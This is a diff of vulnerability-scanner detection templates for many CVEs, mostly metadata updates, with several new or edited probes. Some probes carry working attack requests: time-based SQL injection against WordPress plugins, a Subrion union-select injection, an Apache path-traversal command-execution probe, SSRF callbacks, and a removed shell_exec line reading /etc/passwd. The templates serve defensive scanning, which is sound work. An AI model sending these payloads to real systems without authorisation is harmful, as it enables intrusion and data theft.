@ -2,7 +2,7 @@ id: CVE-2015-2794
info: info:
name: DotNetNuke 07.04.00 - Administration Authentication Bypass name: DotNetNuke 07.04.00 - Administration Authentication Bypass
author: 1337kro author: 0xr2r
severity: critical severity: critical
description: | description: |
The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx. The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.
@ -45,4 +45,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a004730450221008832d97a34293638b4c086c5a28aff802fdb47075161daec024897821ed9922b02202ce97274853804157a6224c3711bc0fb0fa9f58c60aef8297fc5f8747126c182:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402205b931368f972e054b081418fdcdbd6d16c6c7a1ef76a663c0d9db9d8c3fc353f02207c5737d6057af1e35c3ca3e3687a60ef1bf3ba7e59e7d90e9a39bd6fabc3213a:922c64590222798bb761d5b6d8e72950

View File

@ -27,19 +27,23 @@ info:
product: subrion_cms product: subrion_cms
tags: cve2017,cve,sqli,subrion,intelliants tags: cve2017,cve,sqli,subrion,intelliants
variables:
string: "{{to_lower(rand_base(5))}}"
hex_string: "{{hex_encode(string)}}"
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1" - "{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "projectdiscovery.io" - '{{string}}'
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a004730450221008122f5a7f1c537936474771ca8cbc773e4fd522783e15948324010c182882d44022034bde42890c4acf5f2806b5e320405129f41263dcbf69b64ef49635cf58d8e0d:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022054097ca889716ee0d3ffd26eccb31e1090cc41ee675729b96e5ec67138f7634c022043939c20b2460e4071b9a01a8d590cef58a83e2c49c0f73b1f517d3434666c0f:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
max-request: 65 max-request: 65
vendor: embedthis vendor: embedthis
product: goahead product: goahead
tags: cve,cve2017,rce,goahead,brute-force,kev,vulhub,embedthis tags: cve,cve2017,rce,goahead,bruteforce,kev,vulhub,embedthis
http: http:
- raw: - raw:
@ -117,4 +117,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022047ce66d8caa4a42f359d87b562ccfd3702d82b3e5306d17049fc7572d66bc16c022100bf004dc58ed2839f05b495f4434442d941c1de5236150a6fd3606381073f7ed5:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100dec8b43170cf34ed98fbf83c8dc09389ffefda9fd823a123f509f32dbb63cc570220638e59f0bec3b3ab5a49d51408722e58ca5276e415dfaa2cb4821b2c65b295ac:922c64590222798bb761d5b6d8e72950

View File

@ -20,8 +20,8 @@ info:
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2018-17431 cve-id: CVE-2018-17431
cwe-id: CWE-287 cwe-id: CWE-287
epss-score: 0.11315 epss-score: 0.11416
epss-percentile: 0.94677 epss-percentile: 0.95073
cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
metadata: metadata:
max-request: 2 max-request: 2
@ -50,4 +50,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a0047304502206e56a0d536dfc8d4ed10ae0505f2d2548b6c986854d0813c6e8185acc66756d9022100e74e57bbb9b04d2860f174d0f9effbef03a265a0ada954ea317f3fffa89a12ca:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100b58e1f2764198a04cdc831884ce49a67189b6a1988fcf7e27f9d82ed83cd2a3402206c36044d3ad9e30032c1e67d471ee256bb7602b09812ffc7830995d5808c7ff1:922c64590222798bb761d5b6d8e72950

View File

@ -15,13 +15,14 @@ info:
- https://wordpress.org/plugins/jsmol2wp/ - https://wordpress.org/plugins/jsmol2wp/
- https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt - https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
- https://nvd.nist.gov/vuln/detail/CVE-2018-20463 - https://nvd.nist.gov/vuln/detail/CVE-2018-20463
- https://github.com/ARPSyndicate/cvemon
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5
cve-id: CVE-2018-20463 cve-id: CVE-2018-20463
cwe-id: CWE-22 cwe-id: CWE-22
epss-score: 0.01939 epss-score: 0.01939
epss-percentile: 0.87393 epss-percentile: 0.88289
cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*
metadata: metadata:
verified: true verified: true
@ -53,4 +54,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a0047304502205f9aeadd874f5fdf363e87acc0ec34f995e53677d28cbc33b27cf113d9de2b03022100c5b000d74f0180cb372d2dd355622f03e7cb2b5180ac3cb0e6f0660049f49dba:922c64590222798bb761d5b6d8e72950 # digest: 4b0a004830460221008b0f6a4e144ec0a4f5fb0f772930b5da535472e941723be6c675589ac426a8b5022100bef4cc125a636184009e644aeb5fa64c4a868c49d7c081e63409ed228515e3ed:922c64590222798bb761d5b6d8e72950

View File

@ -27,7 +27,7 @@ info:
max-request: 100 max-request: 100
vendor: zabbix vendor: zabbix
product: zabbix product: zabbix
tags: cve2019,cve,brute-force,auth-bypass,login,edb,zabbix tags: cve2019,cve,bruteforce,auth-bypass,login,edb,zabbix
http: http:
- raw: - raw:
@ -49,4 +49,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a004830460221009f2eef4ff9783ccdb0da0deb516cbeef6088cf8748cea7f07e2d0db26e145471022100e1a20eb9c42ec21526ec4e60014c9c44a9cb9eebf923e1e0016faabd478bd8ce:922c64590222798bb761d5b6d8e72950 # digest: 4b0a004830460221009174b05ef7a525c5b373a0d82c9f2e6ef53e2f208703ddae369493fdf4e868d5022100ffcea06c1174e9a583cf539ef4f49ecda6eb0849493b197b58859a5e058e7cb4:922c64590222798bb761d5b6d8e72950

View File

@ -27,20 +27,24 @@ info:
max-request: 1 max-request: 1
vendor: nette vendor: nette
product: application product: application
fofa-query: app="nette-Framework"
verified: true
tags: cve2020,cve,nette,rce tags: cve2020,cve,nette,rce
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1" - "{{BaseURL}}/nette.micro/?callback=phpcredits"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: word
regex: part: body
- "root:.*:0:0:" words:
- "PHP Credits"
- type: status - type: word
status: part: header
- 200 words:
# digest: 4a0a00473045022100c514809246bae4d622a6f54b7f309f8d1838a8320122852f607689aa0d8591f00220583827d07fe105e21e3f2c8d355bd4a383c60d0b9fa26ec3897668a09ea6a421:922c64590222798bb761d5b6d8e72950 - "Nette Framework"
# digest: 4a0a00473045022100c7edf32bbe09d40436d30da39271cd16112ead5a0c94b155a42dce50938fb84c0220526028064e9f272d8365aafc3b6b7558d1f606bd48da3dcf7576ceee091b452e:922c64590222798bb761d5b6d8e72950

View File

@ -20,8 +20,8 @@ info:
cvss-score: 6.1 cvss-score: 6.1
cve-id: CVE-2020-24223 cve-id: CVE-2020-24223
cwe-id: CWE-79 cwe-id: CWE-79
epss-score: 0.00976 epss-score: 0.0069
epss-percentile: 0.81758 epss-percentile: 0.79602
cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*
metadata: metadata:
max-request: 1 max-request: 1
@ -49,4 +49,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100c973b82339421ec3089eac4ceee54851fb8db56c023e4110994b8c16b279307f022100ba5f5c61a9f8acb6755ba89ca34bb684ee60ac4e1e7c96f40f0688789b22e49a:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502203465eb756d9c1c2a642192e678566a419006885438b5721b7a8b54470650a994022100a3b09f8d55baad75a18b6eb7fab36fd7cf976201304457c717358dd7b6fa2862:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
vendor: redhat vendor: redhat
product: keycloak product: keycloak
shodan-query: "title:\"keycloak\"" shodan-query: "title:\"keycloak\""
tags: cve,cve2020,keyclock,exposure tags: cve,cve2020,keycloak,exposure
http: http:
- method: GET - method: GET
@ -52,4 +52,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100a6e9bf7a3b64c5e90d619114c77ef26e4910bb56c4488208e2381e574562d66e022100944c1456d486efb48fc5d8d143759d157d22b7b23d81cffcf4cbd94219ae8cd0:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100e340099dadc3710a63b8cc3e0182b0c1a738f7480c069fa5c39913092f31b39802201ad2dbae637d451dd3a442b8c8a7d2f0d5244240545b98ba4431a62241c66fa6:922c64590222798bb761d5b6d8e72950

View File

@ -14,13 +14,15 @@ info:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274 - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
- https://nvd.nist.gov/vuln/detail/CVE-2021-21805 - https://nvd.nist.gov/vuln/detail/CVE-2021-21805
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2021-21805 cve-id: CVE-2021-21805
cwe-id: CWE-78 cwe-id: CWE-78
epss-score: 0.97374 epss-score: 0.97374
epss-percentile: 0.99892 epss-percentile: 0.99895
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
metadata: metadata:
verified: true verified: true
@ -52,4 +54,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100f2a3e97b98df27aafb1f8001f577c595d1cbb4fed075db594314502fbf283bd602204b4e9e0d429dacbd3c7672f6fd16118bbc7e73d54077c27d333a19e89ac0f5db:922c64590222798bb761d5b6d8e72950 # digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950

View File

@ -21,7 +21,7 @@ info:
cve-id: CVE-2021-22873 cve-id: CVE-2021-22873
cwe-id: CWE-601 cwe-id: CWE-601
epss-score: 0.00922 epss-score: 0.00922
epss-percentile: 0.81209 epss-percentile: 0.82474
cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
metadata: metadata:
verified: true verified: true
@ -49,4 +49,4 @@ http:
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 490a0046304402206825e5ab8251fc139a7b9f7ac5b06687ca56ae1e65ed767ca11c20c7930c7e1f02205a2f6d3c6d66a885a07cd69568accc9951b72dc883ed9cc1f62f561083da2e0c:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502201f562b389b6a5f97abaafe839123249c8bfc49d20d8cc12c06a61ee23b840795022100e4d6049c15f40c1564d2e55b52873ca91a7030a85feb7605ebf54ce291e513d5:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,49 @@
id: CVE-2021-24442
info:
name: Wordpress Polls Widget < 1.5.3 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks
remediation: Fixed in 1.5.3
reference:
- https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24442
- https://wordpress.org/plugins/polls-widget/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24442
cwe-id: CWE-89
epss-score: 0.00212
epss-percentile: 0.58237
cpe: cpe:2.3:a:wpdevart:poll\,_survey\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wpdevart
product: poll\,_survey\,_questionnaire_and_voting_system
framework: wordpress
publicwww-query: "/wp-content/plugins/polls-widget/"
tags: wpscan,cve,cve2021,wp,wp-plugin,wpscan,wordpress,polls-widget,sqli
http:
- raw:
- |
@timeout: 25s
POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Forwarded-For: {{randstr}}
question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains_all(body, "{\"answer_name", "vote\":")'
condition: and
# digest: 4a0a00473045022077e2d0f0096519c85cc2560e8aa0947b9480af46a12b487659284f2207bd7a13022100eff5ad69413aa6014c4fc03c62f75c9e69ec2e5bfb10908470a3f44c6bcecdff:922c64590222798bb761d5b6d8e72950

View File

@ -13,8 +13,8 @@ info:
reference: reference:
- https://www.exploit-db.com/exploits/50766 - https://www.exploit-db.com/exploits/50766
- https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget - https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget
- https://nvd.nist.gov/vuln/detail/CVE-2021-24762
- https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad - https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad
- https://nvd.nist.gov/vuln/detail/CVE-2021-24762
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
@ -28,13 +28,13 @@ info:
vendor: getperfectsurvey vendor: getperfectsurvey
product: perfect_survey product: perfect_survey
framework: wordpress framework: wordpress
tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,unauth,edb,getperfectsurvey tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey
http: http:
- raw: - raw:
- | - |
@timeout: 15s @timeout: 15s
POST /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1 GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
matchers-condition: and matchers-condition: and
@ -51,4 +51,4 @@ http:
- type: status - type: status
status: status:
- 404 - 404
# digest: 4b0a00483046022100dc31a17605a60d5af3be547b7336024caf4ab4335ca417a63422a3bcc4bbb8b6022100b2d7e5fce40df099911318ad66b154d1f69a76338f56107dc6284b6c231579ad:922c64590222798bb761d5b6d8e72950 # digest: 4b0a0048304602210088b2f8641efb17289d0c9fa1e0fc57697b83b89f2c710a54603d6e0536009441022100c2ca459924277032aeae17d881fd19c80a6e3501bb3ff5be948390480bec353d:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,70 @@
id: CVE-2021-24849
info:
name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
reference:
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
- https://wordpress.org/plugins/wc-multivendor-marketplace/
remediation: Fixed in 3.4.12
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24849
cwe-id: CWE-89
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
epss-score: 0.00199
epss-percentile: 0.56492
metadata:
product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"
framework: wordpress
publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
verified: true
max-request: 3
vendor: wclovers
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
condition: and
internal: true
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{post_data}}
payloads:
post_data:
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(header, "application/json")'
- 'contains(body, "success")'
condition: and
# digest: 4a0a00473045022100ef54cd087054515b6ef2f1935d258ecea55b3abf384cd95798b8cd351a5f1fe90220070a59d1e5a3ab49e8fc248e2ddc238e33958d75f7b3cfc5700b5018b8116f82:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,51 @@
id: CVE-2021-24943
info:
name: Registrations for the Events Calendar < 2.7.6 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.
remediation: Fixed in 2.7.6
reference:
- https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24943
- https://wordpress.org/plugins/registrations-for-the-events-calendar/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24943
cwe-id: CWE-89
epss-score: 0.00199
epss-percentile: 0.56492
cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: roundupwp
product: registrations_for_the_events_calendar
framework: wordpress
publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/"
tags: wpscan,cve,cve2021,wp,wp-plugin,wpscan,wordpress,sqli,registrations-for-the-events-calendar
variables:
text: "{{rand_base(5)}}"
http:
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(body, "Please enter the email you registered with")'
condition: and
# digest: 490a0046304402205fdda9c8d4779e2557fe7c639bac3b8efca15af2034265114daf03628ab5e8f90220450c244cc25345ee7065bcecb32ae6c7b1e33cc7bd263a94334969d729692ca7:922c64590222798bb761d5b6d8e72950

View File

@ -18,13 +18,14 @@ info:
cve-id: CVE-2021-27748 cve-id: CVE-2021-27748
metadata: metadata:
verified: true verified: true
max-request: 2 max-request: 3
shodan-query: http.html:"IBM WebSphere Portal" shodan-query: http.html:"IBM WebSphere Portal"
tags: cve2021,cve,hcl,ibm,ssrf,websphere tags: cve2021,cve,hcl,ibm,ssrf,websphere
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}'
- '{{BaseURL}}/docpicker/internal_proxy/http/oast.me' - '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me' - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
@ -35,10 +36,13 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body
words: words:
- "Interactsh Server" - "Interactsh Server"
- type: status - type: word
status: part: body_1
- 200 words:
# digest: 4b0a00483046022100b6134f89233da535e75fb3d2abac8b55797ec0997bc234ba4559b250efcc3489022100c2cce298030c3efdccc4e809925e7d77d72aab31f1de74f9c86ab5ae022b0a1e:922c64590222798bb761d5b6d8e72950 - "Interactsh Server"
negative: true
# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950

View File

@ -18,8 +18,8 @@ info:
cwe-id: CWE-22 cwe-id: CWE-22
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:* cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
metadata: metadata:
max-request: 1 shodan-query: "title:\"openSIS\""
shodan-query: title:"openSIS" max-request: 2
tags: cve,cve2021,lfi,os4ed,opensis,authenticated tags: cve,cve2021,lfi,os4ed,opensis,authenticated
http: http:
@ -42,4 +42,4 @@ http:
- 'contains(body_1, "openSIS")' - 'contains(body_1, "openSIS")'
- "status_code == 200" - "status_code == 200"
condition: and condition: and
# digest: 490a004630440220206394b303ab92ce65590e2c61e6eb5e9914219a5a0651ae69009a3f224109ff02207e729d1c062d3bd2e445a39a036992cc281564407a764e7f7ced5f02879f1034:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100924b4c785059886c8131bde539e1106c1be30952a7fea88bd992cb9cc3e7aca202204c4c3c880b323df6c23378c766e00dd0222716aa49f384cbc8f4c37b7c9ab38f:922c64590222798bb761d5b6d8e72950

View File

@ -1,4 +1,4 @@
id: "CVE-2021-42013" id: CVE-2021-42013
info: info:
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
@ -30,7 +30,7 @@ info:
product: http_server product: http_server
tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev
variables: variables:
cmd: "echo COP-37714-1202-EVC | rev" cmd: "echo 31024-1202-EVC | rev"
http: http:
- raw: - raw:
@ -66,4 +66,4 @@ http:
name: LFI name: LFI
regex: regex:
- "root:.*:0:0:" - "root:.*:0:0:"
# digest: 4a0a0047304502210090df2d0b0784bca0957316b00eda4a86eff7538dafa59481ce77ae33976454a0022052bca4f8bcc25e748dd8ed529bba9efc648ebfa54c19b8177f9c0c4fc2da6858:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402207470f1e0707171ed23b51282f56448b47cde756e37792253a19e6abc7c6a2b2b02203d6616b33eca925f272433a727bd685d8173454004fe09a7a6cdedc6daffb2a6:922c64590222798bb761d5b6d8e72950

View File

@ -10,7 +10,7 @@ info:
- https://github.com/chillzhuang/blade-tool - https://github.com/chillzhuang/blade-tool
metadata: metadata:
max-request: 3 max-request: 3
tags: cve,cve2023,springblade,blade,info-leak tags: cve,cve2021,springblade,blade,info-leak
http: http:
- raw: - raw:
@ -44,4 +44,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a004630440220304c9e6f27e05f7a603b614d229e59b893ef58d1528c62bd920706d9791db8d60220587079c49206fcc78d95924e9f27e54f38142ba541eb9ab46393425965a88263:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100b8965db2f12da5b92605ff6a2c1e8b8968f42d7d31259e428c54abd9c342066e02210098f2e2b339dcd515081900537d59c694775232efa61957cfe2944fc5c159c9db:922c64590222798bb761d5b6d8e72950

View File

@ -21,7 +21,7 @@ info:
cve-id: CVE-2022-0776 cve-id: CVE-2022-0776
cwe-id: CWE-79 cwe-id: CWE-79
epss-score: 0.001 epss-score: 0.001
epss-percentile: 0.40832 epss-percentile: 0.40075
cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:* cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:*
metadata: metadata:
vendor: revealjs vendor: revealjs
@ -48,4 +48,4 @@ headless:
part: extract part: extract
words: words:
- "true" - "true"
# digest: 4a0a00473045022015776ab1f8ee5f7cbd078059bc34167a0b8ca0a11a1bda34723f7ec03d31b6c302210098d1c6a54ecbafb3158390aea2498590fe70df9d78d3266d388274859a641533:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100822f5151d594a59ff99bde533919eb403ddd05ab8d041ea5963a1c88f81d84320221008c8e17c078665f80ff1f6815e2f071996a8d9e4712b43e3bf775f0c2db3e0e12:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
vendor: automattic vendor: automattic
product: sensei_lms product: sensei_lms
framework: wordpress framework: wordpress
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,brute-force,hackerone,wordpress,wp-plugin,automattic tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,bruteforce,hackerone,wordpress,wp-plugin,automattic
http: http:
- method: GET - method: GET
@ -56,4 +56,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a0046304402201f56469497c402e5060dd148bc20614451e7dca2ff2a02ed0137deb3c983730102203aef693927819b4ac18f1f31b55f4799f6de8c2477e411a36515df9dba050dc5:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402207c51a21553085f96246b9b7a7b8fcb17455c8ede92140fc56ac74b94c60b3fcf022054295c2dbda0cd3975caa9c8ac89cd1d99b8f237e8fe3258e096d29e53f99f61:922c64590222798bb761d5b6d8e72950

View File

@ -22,7 +22,7 @@ info:
cve-id: CVE-2022-26263 cve-id: CVE-2022-26263
cwe-id: CWE-79 cwe-id: CWE-79
epss-score: 0.00147 epss-score: 0.00147
epss-percentile: 0.50638 epss-percentile: 0.49633
cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:* cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:*
metadata: metadata:
verified: true verified: true
@ -43,4 +43,4 @@ headless:
- '<frame src="javascript:console.log(document.domain)"' - '<frame src="javascript:console.log(document.domain)"'
- 'webhelp4.js' - 'webhelp4.js'
condition: and condition: and
# digest: 4a0a00473045022100a72f95b8648b73eb2e4cf2ea58e09902bdd87b68ed16d6258763f77029657162022064b391ae3ee631c189007bc15526ede89c3be32159ec215d129a1840544b297e:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100c124eb614790888649b3ad794123f8a4d5127efb6b3dfcccc25a1431ae2dd660022100bdd24ef15743a8543fc37ed7a7e4a0399762873c6016d5cd6a811baa514a747d:922c64590222798bb761d5b6d8e72950

View File

@ -22,7 +22,7 @@ info:
cve-id: CVE-2022-30776 cve-id: CVE-2022-30776
cwe-id: CWE-79 cwe-id: CWE-79
epss-score: 0.00112 epss-score: 0.00112
